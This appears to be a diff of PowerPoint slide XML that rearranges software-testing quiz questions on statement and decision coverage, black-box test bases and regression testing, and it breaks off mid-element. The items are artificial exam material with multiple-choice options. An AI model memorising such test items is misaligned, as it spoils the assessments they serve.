+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Considering the following pseudo-code, calculate the MINIMUM number of test cases</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>for statement coverage, and the MINIMUM number of test cases for decision </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>coverage respectively.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>READ A</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>READ B</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>READ C</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>IF C&gt;A THEN</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>IF C&gt;B THEN</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>PRINT "C must be smaller than at least one number"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>ELSE PRINT "Proceed to next stage“</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>   ENDIF</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>ELSE</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>PRINT "B can be smaller than C"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>ENDIF</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>A 3, 3.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>B 2, 3.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>C 2, 4.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>D 3, 2.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
@@ -4452,272 +4200,6 @@
               <a:ea typeface="+mn-ea"/>
               <a:cs typeface="+mn-cs"/>
             </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Question 3</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>The following statements are used to describe the basis for creating test cases using either</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>black or white box techniques:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> information about how the software is constructed.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>ii models of the system, software or components.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>iii analysis of the test basis documentation.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>iv analysis of the internal structure of the components.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Which combination of the statements describes the basis for black box techniques?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>A ii and iii.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>B ii and iv.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>C </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> and iv.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>D </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> and iii.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
@@ -4762,13 +4244,8 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>Question </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>4</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Question 3</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
@@ -4783,7 +4260,7 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>Which of following statements is true? Select ALL correct options.</a:t>
+              <a:t>The following statements are used to describe the basis for creating test cases using either</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
@@ -4801,7 +4278,7 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>Regression testing should be performed:</a:t>
+              <a:t>black or white box techniques:</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4832,7 +4309,7 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t> once a month</a:t>
+              <a:t> information about how the software is constructed.</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
@@ -4850,7 +4327,7 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>ii when a defect has been fixed</a:t>
+              <a:t>ii models of the system, software or components.</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
@@ -4868,7 +4345,7 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>iii when the test environment has changed</a:t>
+              <a:t>iii analysis of the test basis documentation.</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
@@ -4886,7 +4363,7 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>iv when the software has changed</a:t>
+              <a:t>iv analysis of the internal structure of the components.</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -4906,8 +4383,10 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>A ii and iv.</a:t>
-            </a:r>
+              <a:t>Which combination of the statements describes the basis for black box techniques?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
               <a:t/>
@@ -4924,7 +4403,25 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>B ii, iii and iv.</a:t>
+              <a:t>A ii and iii.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>B ii and iv.</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
@@ -4964,7 +4461,7 @@
                 <a:ea typeface="+mn-ea"/>
                 <a:cs typeface="+mn-cs"/>
               </a:rPr>
-              <a:t>, ii and iii.</a:t>
+              <a:t> and iv.</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" smtClean="0"/>
@@ -5008,7 +4505,7 @@
             </a:r>
           </a:p>
           <a:p>
-            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
@@ -5057,6 +4554,297 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>4</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Which of following statements is true? Select ALL correct options.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Regression testing should be performed:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> once a month</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>ii when a defect has been fixed</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>iii when the test environment has changed</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>iv when the software has changed</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>A ii and iv.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
